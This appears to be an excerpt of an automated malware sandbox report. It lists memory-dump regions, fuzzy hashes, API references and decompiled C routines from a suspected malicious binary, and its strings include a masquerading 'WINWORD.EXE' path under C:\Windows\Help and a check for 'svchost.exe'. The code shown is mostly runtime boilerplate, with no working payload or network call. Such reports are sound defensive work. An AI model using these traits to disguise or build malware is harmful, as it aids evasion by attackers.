    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 94393892a679d471d7389661207167f50f2b7ac127f216884e1afbd9320eb17e
    • Instruction ID: a8be188f0729cebfdd84b0cc3062c1923a8a7a9b5190344390ede85c66f4dd2b
    • Opcode Fuzzy Hash: 94393892a679d471d7389661207167f50f2b7ac127f216884e1afbd9320eb17e
    • Instruction Fuzzy Hash: 23E086B5E04160FB8F519F199DCC7453EF1E72E7643426406E40002B14CB324413DFD4
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID:
    • String ID: C:\Windows\Help\Windows\WINWORD.EXE
    • API String ID: 0-204361137
    • Opcode ID: e1bb7e85e4c62ad645afde82aa3b8093dd670883d7c5cc4691fdc579a3d1b7e9
    • Instruction ID: b1f6dd0b3d6ec0a9c116429db8b4fc30af2a5d8cf9909d399ef20685a0810045
    • Opcode Fuzzy Hash: e1bb7e85e4c62ad645afde82aa3b8093dd670883d7c5cc4691fdc579a3d1b7e9
    • Instruction Fuzzy Hash: C3415075E16219BFDB21EF99D8C0DAEBBFCEB86710B144066E415AB200D7729A40CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E6D867038(void* __edx, intOrPtr _a4) {
    				signed int _v8;
    				void* _v12;
    				char _v16;
    				char* _v20;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				char* _t26;
    				intOrPtr* _t36;
    				signed int _t37;
    				signed int _t40;
    				char _t42;
    				signed int _t43;
    				intOrPtr* _t44;
    				intOrPtr* _t45;
    				intOrPtr _t48;
    				signed int _t49;
    				signed int _t54;
    				void* _t57;
    				intOrPtr* _t58;
    				void* _t59;
    				signed int _t64;
    				signed int _t66;
    
    				_t57 = __edx;
    				_t48 = _a4;
    				if(_t48 != 0) {
    					__eflags = _t48 - 2;
    					if(_t48 == 2) {
    						L5:
    						_push(_t59);
    						E6D8693C3(_t48, _t59);
    						E6D868E04(_t57, 0, 0x6d8c1488, 0x104);
    						_t26 =  *0x6d8c1730; // 0x1643638
    						 *0x6d8c1720 = 0x6d8c1488;
    						_v20 = _t26;
    						__eflags = _t26;
    						if(_t26 == 0) {
    							L7:
    							_t26 = 0x6d8c1488;
    							_v20 = 0x6d8c1488;
    							L8:
    							_v8 = 0;
    							_v16 = 0;
    							_t64 = E6D8672E5(E6D86716E( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
    							__eflags = _t64;
    							if(__eflags != 0) {
    								E6D86716E( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
    								__eflags = _t48 - 1;
    								if(_t48 != 1) {
    									_v12 = 0;
    									_push( &_v12);
    									_t49 = E6D868CF7(_t48, 0, _t64, _t64);
    									__eflags = _t49;
    									if(_t49 == 0) {
    										_t58 = _v12;
    										_t54 = 0;
    										_t36 = _t58;
    										__eflags =  *_t58;
    										if( *_t58 == 0) {
    											L17:
    											_t37 = 0;
    											 *0x6d8c1724 = _t54;
    											_v12 = 0;
    											_t49 = 0;
    											 *0x6d8c1728 = _t58;
    											L18:
    											E6D867CC2(_t37);
    											_v12 = 0;
    											L19:
    											E6D867CC2(_t64);
    											_t40 = _t49;
    											L20:
    											return _t40;
    										} else {
    											goto L16;
    										}
    										do {
    											L16:
    											_t36 = _t36 + 4;
    											_t54 = _t54 + 1;
    											__eflags =  *_t36;
    										} while ( *_t36 != 0);
    										goto L17;
    									}
    									_t37 = _v12;
    									goto L18;
    								}
    								_t42 = _v8 - 1;
    								__eflags = _t42;
    								 *0x6d8c1724 = _t42;
    								_t43 = _t64;
    								_t64 = 0;
    								 *0x6d8c1728 = _t43;
    								L12:
    								_t49 = 0;
    								goto L19;
    							}
    							_t44 = E6D866A5B(__eflags);
    							_push(0xc);
    							_pop(0);
    							 *_t44 = 0;
    							goto L12;
    						}
    						__eflags =  *_t26;
    						if( *_t26 != 0) {
    							goto L8;
    						}
    						goto L7;
    					}
    					__eflags = _t48 - 1;
    					if(__eflags == 0) {
    						goto L5;
    					}
    					_t45 = E6D866A5B(__eflags);
    					_t66 = 0x16;
    					 *_t45 = _t66;
    					E6D86699E();
    					_t40 = _t66;
    					goto L20;
    				}
    				return 0;
    			}



























    0x6d867038
    0x6d867041
    0x6d867046
    0x6d867050
    0x6d867053
    0x6d867070
    0x6d867070
    0x6d867071
    0x6d867084
    0x6d867089
    0x6d867091
    0x6d867097
    0x6d86709a
    0x6d86709c
    0x6d8670a3
    0x6d8670a3
    0x6d8670a5
    0x6d8670a8
    0x6d8670ab
    0x6d8670b2
    0x6d8670cb
    0x6d8670d0
    0x6d8670d2
    0x6d8670f3
    0x6d8670fb
    0x6d8670fe
    0x6d867119
    0x6d86711c
    0x6d867123
    0x6d867127
    0x6d867129
    0x6d867130
    0x6d867133
    0x6d867135
    0x6d867137
    0x6d867139
    0x6d867143
    0x6d867143
    0x6d867145
    0x6d86714b
    0x6d86714e
    0x6d867150
    0x6d867156
    0x6d867157
    0x6d86715d
    0x6d867160
    0x6d867161
    0x6d867167
    0x6d86716a
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6d86713b
    0x6d86713b
    0x6d86713b
    0x6d86713e
    0x6d86713f
    0x6d86713f
    0x00000000
    0x6d86713b
    0x6d86712b
    0x00000000
    0x6d86712b
    0x6d867103
    0x6d867103
    0x6d867104
    0x6d867109
    0x6d86710b
    0x6d86710d
    0x6d867112
    0x6d867112
    0x00000000
    0x6d867112
    0x6d8670d4
    0x6d8670d9
    0x6d8670db
    0x6d8670dc
    0x00000000
    0x6d8670dc
    0x6d86709e
    0x6d8670a1
    0x00000000
    0x00000000
    0x00000000
    0x6d8670a1
    0x6d867055
    0x6d867058
    0x00000000
    0x00000000
    0x6d86705a
    0x6d867061
    0x6d867062
    0x6d867064
    0x6d867069
    0x00000000
    0x6d867069
    0x00000000

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: C:\Windows\Help\Windows\WINWORD.EXE
    • API String ID: 0-204361137
    • Opcode ID: a8855e70195e9c320126c3327eb047436a43c99f000d9420f97c59dcd9bb7e5c
    • Instruction ID: 6e01404468199384537075d0340bd9363235799ef5e0d3220283aa060a1469fb
    • Opcode Fuzzy Hash: a8855e70195e9c320126c3327eb047436a43c99f000d9420f97c59dcd9bb7e5c
    • Instruction Fuzzy Hash: 574183B1E14299EBDB12CB9D8C88E9EBBF8EF89320F114866F50497640D7718A41C7F1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • ___except_validate_context_record.LIBVCRUNTIME ref: 0303326F
    • __IsNonwritableInCurrentImage.LIBCMT ref: 03033323
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 3480331319-1018135373
    • Opcode ID: 95e876e8fbff18f529a0fb3dcc1a5ec9328b99bce20c6dcae1ef39241578a303
    • Instruction ID: da430467cc91366c6a51cddc26e4e2cec1717d1010a15c0c5069f972c90d048b
    • Opcode Fuzzy Hash: 95e876e8fbff18f529a0fb3dcc1a5ec9328b99bce20c6dcae1ef39241578a303
    • Instruction Fuzzy Hash: 0041C27CA02208ABCF10DF69C8C0ADEBBF9AF46214F1881D5E8159B351D7359A01CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • ___except_validate_context_record.LIBVCRUNTIME ref: 0304E03F
    • __IsNonwritableInCurrentImage.LIBCMT ref: 0304E0F3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 3480331319-1018135373
    • Opcode ID: 99759f6fd2f402baa72d4a3d7d8b78b179f8606f02dc614000ee703c95d9db5f
    • Instruction ID: aafc212fbab892483f6a3f1d7490717d566da5ba95a06db6fe1b656ebfab1354
    • Opcode Fuzzy Hash: 99759f6fd2f402baa72d4a3d7d8b78b179f8606f02dc614000ee703c95d9db5f
    • Instruction Fuzzy Hash: 6D41B0B4A022189BCF10DF68C880ADEBBF5BF45364F1881B5E924AB391D7319B51CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • ___except_validate_context_record.LIBVCRUNTIME ref: 03065E3F
    • __IsNonwritableInCurrentImage.LIBCMT ref: 03065EF3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 3480331319-1018135373
    • Opcode ID: e1033b445011ec664d7027c08b3f5ef2303681d7ae0e9ab8bb06f2b21b3a1336
    • Instruction ID: 6d8d154081c4f9b5db904f8b35eb1e87b8f5c8aa73917dc22356208dfa239d34
    • Opcode Fuzzy Hash: e1033b445011ec664d7027c08b3f5ef2303681d7ae0e9ab8bb06f2b21b3a1336
    • Instruction Fuzzy Hash: 7A41AF34A023089BCF14DF68CC84ADEBBF5AF46224F188195E8189F399D731DA05CB90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: Catch
    • String ID: MOC$RCC
    • API String ID: 78271584-2084237596
    • Opcode ID: f94b04915f4234a4143f36e0f748e42c96bbefe463550c5a0bb3a9fd398d035d
    • Instruction ID: fcae9a691738c52a1e0213bee7a51c0cf16f66d6f284d1e4e86f246ca415d3b7
    • Opcode Fuzzy Hash: f94b04915f4234a4143f36e0f748e42c96bbefe463550c5a0bb3a9fd398d035d
    • Instruction Fuzzy Hash: 054159B690120AEFCF15DF98CD80AEEBBB5FF48314F1880A9F9056B211D3359A51DB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: Catch
    • String ID: MOC$RCC
    • API String ID: 78271584-2084237596
    • Opcode ID: 5205c645b221ac826937bf7a6a5dcb3dcdc24bc03e86e90f88a7140f791635fb
    • Instruction ID: 55ade9c1f9342ec8b2df75b059ff5b0b148c0fe63f466fc0d17d51cf9ea004dc
    • Opcode Fuzzy Hash: 5205c645b221ac826937bf7a6a5dcb3dcdc24bc03e86e90f88a7140f791635fb
    • Instruction Fuzzy Hash: 1A413D7190120DAFDF15DF98CD80AEEBBB9FF48304F188199F905AA254D3369960DB61
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 03031043
    • _strrchr.LIBCMT ref: 03031052
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: FileModuleName_strrchr
    • String ID: svchost.exe
    • API String ID: 1375183968-3106260013
    • Opcode ID: cbc45639113b57d55091dba1172332e7d2b9bb8378bf6a69451770e83e566935
    • Instruction ID: 3eb69e6e9fb4b7f29bd95b93b1cc4f588a4ee66a380fb72fdc89eb62393070a5
    • Opcode Fuzzy Hash: cbc45639113b57d55091dba1172332e7d2b9bb8378bf6a69451770e83e566935
    • Instruction Fuzzy Hash: 2DF027B8A063186AEB10FB759D06EEF77ACDB05300F4004A5A982D7181DAB48A454680
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D861463(intOrPtr* __ecx, void* __eflags) {
    				intOrPtr* _t13;
    
    				_t13 = __ecx;
    				E6D8614B6(__ecx);
    				 *__ecx = 0x38;
    				 *((intOrPtr*)(__ecx + 8)) = 0x6d860000;
    				 *((intOrPtr*)(__ecx + 4)) = 0x6d860000;
    				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
    				 *((intOrPtr*)(__ecx + 0x10)) = 0x6d8701c0;
    				if(E6D861420(0x6d860000, __ecx + 0x14) < 0) {
    					if(IsDebuggerPresent() != 0) {
    						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
    					}
    					 *0x6d8c1a74 = 1;
    				}
    				return _t13;
    			}




    0x6d861464
    0x6d861466
    0x6d861470
    0x6d861479
    0x6d86147c
    0x6d86147f
    0x6d861486
    0x6d861494
    0x6d86149e
    0x6d8614a5
    0x6d8614a5
    0x6d8614ab
    0x6d8614ab
    0x6d8614b5

    APIs
      • Part of subcall function 6D861420: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,6D861492,?,?,?,6D861015), ref: 6D861425
      • Part of subcall function 6D861420: GetLastError.KERNEL32(?,?,?,6D861015), ref: 6D86142F
    • IsDebuggerPresent.KERNEL32(?,?,?,6D861015), ref: 6D861496
    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6D861015), ref: 6D8614A5
    Strings
    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6D8614A0
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
    • API String ID: 3511171328-631824599
    • Opcode ID: 11a5bb6a79fdf92d09ef07ddc28879b179ffc2a366ad58cf3694009a3261c2dc
    • Instruction ID: 23f7355e5313f684e98e5b53900dc775c4efd5d43aa405a3e3dd46f6d084d572
    • Opcode Fuzzy Hash: 11a5bb6a79fdf92d09ef07ddc28879b179ffc2a366ad58cf3694009a3261c2dc
    • Instruction Fuzzy Hash: 61E039702047918BD7609F3AD10CB467BF5AB05324F008E1CD546C360AEBB9D048CBB2
    Uniqueness

    Uniqueness Score: -1.00%